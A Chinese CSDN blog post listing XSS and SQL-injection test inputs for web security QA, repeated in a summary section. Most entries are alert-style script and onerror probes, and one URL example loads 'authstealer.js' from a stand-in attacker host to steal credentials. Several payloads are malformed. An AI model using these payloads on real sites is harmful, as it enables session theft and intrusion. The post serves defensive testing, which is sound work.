XSS测试用例

已于 2022-12-16 15:53:11 修改
阅读量1.9k 收藏 5
点赞数
文章标签: xss测试用例
于 2019-05-28 10:31:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q908544703/article/details/90634494
版权

XSS测试用例

1.sql注入

1.sql注入:
基本:update,delete,select,insert
特殊:or,and,sleep,concat,order

2.xss注入用例

2.xss注入用例:
基本:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<svg onerror=alert(`1`)/>

3.js脚本执行

3.js脚本执行:
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>

4.文件上传xss

文件名:xss的关键字,限制中英文数字。
文件格式:mp4,avi,wmv,flv,txt,pdf,xls,xlsx,doc,docx,jpg,png,gif,bmp,jpeg
文件内容:导入模板内容限制中英文数字、长度(100,40)

5.富文本输入、事件、提交

5.富文本输入、事件、提交:
基本:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
onclick,onfocus,iframe,<script,<base>,<form>
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
<font color=red></font>

6.url地址xss

6.url地址xss:
http://bobssite.org?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js"></script>
http://bobssite.org?q=puppies%3Cscript%2520src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E%3C%2Fscript%3E
基本1:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
基本2:update,delete,select,insert
特殊:or,and,sleep,concat,order
onclick,onfocus,iframe,<script,<base>,<form>
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
<font color=red></font>

7.http头xss

修改头部属性信息,用工具测试。
X-Forwarded-For、X-Frame-Options、X-XSS-Protection

8.post数据xss

8.post数据xss:
基本:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
基本2:update,delete,select,insert
特殊:or,and,sleep,concat,order
onclick,onfocus,iframe,<script,<base>,<form>
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>

9.get数据xss

9.get数据xss:
基本:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
基本2:update,delete,select,insert
特殊:or,and,sleep,concat,order
onclick,onfocus,iframe,<script,<base>,<form>
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
<font color=red></font>

10.数据库存储数据xss

10.数据库存储数据xss:
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
<font color=red></font>

11.总结

测试用例:
1.sql注入:
基本:update,delete,select,insert
特殊:or,and,sleep,concat,order
2.xss注入用例:
基本:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<svg onerror=alert(`1`)/>
3.js脚本执行:
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
4.文件上传xss:
文件名:xss的关键字,限制中英文数字。
文件格式:mp4,avi,wmv,flv,txt,pdf,xls,xlsx,doc,docx,jpg,png,gif,bmp,jpeg
文件内容:导入模板内容限制中英文数字、长度(100,40)
5.富文本输入、事件、提交:
基本:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
onclick,onfocus,iframe,<script,<base>,<form>
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
<font color=red></font>
6.url地址xss:
http://bobssite.org?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js"></script>
http://bobssite.org?q=puppies%3Cscript%2520src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E%3C%2Fscript%3E
基本1:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
基本2:update,delete,select,insert
特殊:or,and,sleep,concat,order
onclick,onfocus,iframe,<script,<base>,<form>
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
<font color=red></font>
7.http头xss:
修改头部属性信息,用工具测试。
X-Forwarded-For、X-Frame-Options、X-XSS-Protection
8.post数据xss:
基本:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
基本2:update,delete,select,insert
特殊:or,and,sleep,concat,order
onclick,onfocus,iframe,<script,<base>,<form>
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
9.get数据xss:
基本:<,>,&,',",+,script,img,alert,=,onload,onerror,submit,%
基本2:update,delete,select,insert
特殊:or,and,sleep,concat,order
onclick,onfocus,iframe,<script,<base>,<form>
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
<font color=red></font>
10.数据库存储数据xss:
<script>alert(XSS)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<img src="javascript:alert('XSS')">
<img src=“x” onerror=alert(/1/)>
<a href="javascript:alert(/1/)">XSS</a>
<img src='x:x' onerror=alert(42)>
<img src=oneerrer=alert(“XSS”)>;
<style></style>
<font color=red></font>
<font color=red></font>
q908544703
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
xss攻击汇总
continue my dream
09-04 2970
(1)普通的XSS JavaScript注入 (2)IMG标签XSS使用JavaScript命令 (3)IMG标签无分号无引号 (4)IMG标签大小写不敏感 (5)HTML编码(必须有分号) (6)修正缺陷IMG标签 alert("XSS")"> (7)formCharCode标签(计算器) (8)UTF-8的Unicode编码(计算器) (9)7位的
软件安全测试-Web安全测试详解-XSS攻击
白天像蚂蚁一样工作,晚上像蝴蝶一样生活
12-10 2096
通过该文,可以系统了解xss攻击的原理,测试,防御,无论对手工测试,还是自动化测试都可以很好的根据文章执行。
web安全测试之 xss攻击_request(2)
最新发布
2401_84562143的博客
05-17 971
候(假设他已经登录 a.com), 浏览器就会直接打开 b.com, 并且把 Tom 在 a.com 中的 cookie信息发送到 b.com, b.com 是我 搭建的网站, 当我的网站接收到该信息时, 我就盗取了 Tom在 a.com 的 cookie 信息, cookie 信息中可能存有登录密码, 攻击成功!通过前面对 XSS 攻击的分析, 我们可以看到, 之所以会产生 XSS 攻击, 就是因为 Web应用程序将用户的输入直接嵌入到某个页面当中, 作为该页面的 HTML 代 码的一部分。
python黑客攻防(三)图片文件攻击
qq_43681532的博客
07-08 1759
注:本教程仅供学习交流,未经允许禁止转载。请勿用于非法用途,后果自负。大神勿喷。喜欢的小伙伴可以关注我的微信公众号:黑客帮。 前言: 本篇文章参考自《Python黑客攻防入门》,演示向一张位图(bmp后缀的图片文件)注入JavaScript脚本。 教程: 准备一张“.bmp”后缀的图片文件,可网上下载,也可自己创建。这里我用画图创建了一张,放在D盘,用010Editor编辑器打开,(010Editor编辑器可自行百度下载)可以看到图片的16进制数。42 和 4D分别对应B,M;这就是用于识别位图的“魔数”。
安全测试之xss攻击通用测试用例
测试开发
04-12 757
安全测试,测xss攻击,一个通用case测出一类问题。测试开发同学可以关注一下
【应用安全之XSS一】XSS攻击测试以及防御
qq_35789269的博客
02-19 6482
跨站脚本攻击 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script(php,js等)代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的特殊目的。 攻击实例 下面为一个Input标签: <input type="text" value="value"></input> 当用输入值
XSS 攻击的检测和修复方法
Java徐师兄的博客
07-13 2841
XSS 攻击是一种常见和危险的 Web 攻击,开发者需要对输入数据进行过滤和转义,使用安全的编程语言和框架以及安全的数据库操作,采用 CSP 等措施来防止 XSS 攻击。同时,用户也需要注意不要轻易点击不明来源的链接,避免被诱导访问恶意网站,从而保护自己的信息安全。// 去除输入数据中的 HTML 和 PHP 标签 $data = strip_tags($data);
ECShop系统测试用例.pdf
03-30
测试用例是软件开发过程中的关键部分,确保系统在上线前能够满足预期的功能和性能需求。针对ECShop系统,我们可以从多个维度来设计和执行测试用例,以保证系统的稳定性和用户体验。 1. **商品管理**: - **商品...
最新输入文本框测试用例.doc
06-09
测试用例的设计对于确保软件质量至关重要,尤其是对于这些常见且易出错的输入控件。以下是对两种类型文本框的详细测试知识点: **普通文本输入框** 1. **输入空格**:检查输入中英文空格是否被正确处理。 2. **...
测试用例编写
04-01
测试用例编写是软件开发过程中的关键环节,它确保了产品的质量与功能的全面性。测试用例是一系列预定义的步骤,用于验证特定软件功能或系统行为是否按预期工作。下面将详细介绍测试用例编写的相关知识点,并结合提供...
软件测试用例模板
12-18
5. 安全测试用例:检查软件的安全性,包括权限管理、数据加密、防止SQL注入、XSS攻击等。 6. 压力测试用例:模拟大量用户同时访问,评估系统在极限情况下的稳定性。 7. 回归测试用例:当代码有修改时,这部分用例...
Web安全测试之XSS实例讲解
09-01
本文主要介绍Web安全测试之XSS,这里详细整理了测试XSS的资料,并附示例代码和详细讲解,有需要的小伙伴可以参考下
web安全之XSS攻击demo
04-18
web安全之XSS攻击demo,配合我个人博客使用,谢谢各位的捧场
软件测试课程设计ssm网上购物系统+黑盒测试24个测试用例+白盒24个测试用例
09-06
在这里,我们有24个黑盒测试用例,这些用例通常会涵盖以下几个方面: 1. 用户注册与登录:验证用户信息的输入有效性,注册新用户的成功与失败情况,以及登录时的正确性和错误处理。 2. 商品浏览:检查商品信息展示...
安全测试-XSS攻击
qq_42008891的博客
03-08 589
XSS攻击概念介绍,常规XSS攻击测试方法,XSStrike工具介绍及常规测试命令
网络渗透测试实验三 XSS和SQL注入
weixin_74109869的博客
12-26 1161
综上所述,XSS和SQL注入是常见的网络安全漏洞,通过渗透测试实验可以发现并修复这些漏洞,保护网站的安全。属于储存型XSS,留言过程中,网站没有对输入框的内容进行严格处理,能够被网页执行留言内容,从而被攻击。为了防止XSS攻击,开发人员应该对用户输入进行严格的过滤和验证,确保任何用户输入的内容都经过正确的编码和转义,以防止恶意脚本的注入。在注入实验中,使用恶意语句成功地进行了注入攻击,获取了数据库中的敏感数据.通过这次实验,我认识到SQL注入漏洞对数据库安全的威胁。查看down到本地的用户名与密码,截图。
渗透测试之XSS漏洞:记一次模拟注入攻击
遇事不决 可问春风
09-18 3001
XSS(cross-site script)跨站脚本攻击是一种web应用程序前端漏洞。攻击者将代码注入,用户在使用时由浏览器对漏洞代码进行解析,从而达到恶意攻击用户的特殊目的。
渗透测试之XSS(跨站脚本攻击)
weixin_52177486的博客
02-03 1144
XSS的概念、分类、实例
XSS攻击实战
qq_44915227的博客
04-18 2406
XSS攻击全程跨站脚本攻击。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。与SQL注入类似,XSS也是利用提交恶意信息来实现攻击,但是XSS一般提交的是JavaScript脚本,运行在Web端,就是用户的浏览器。SQL注入提交的SQL命令在后台的数据库服务器执行。
web安全性功能测试用例
11-17
2. XSS测试用例 ```python # 检查是否存在XSS漏洞 # 检查是否存在XSS漏洞 # 检查是否存在XSS漏洞 # 检查是否存在XSS漏洞 # 检查是否存在XSS漏洞 ``` 3. CSRF测试用例 ```python # 检查是否存在CSRF漏洞 # 检查...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值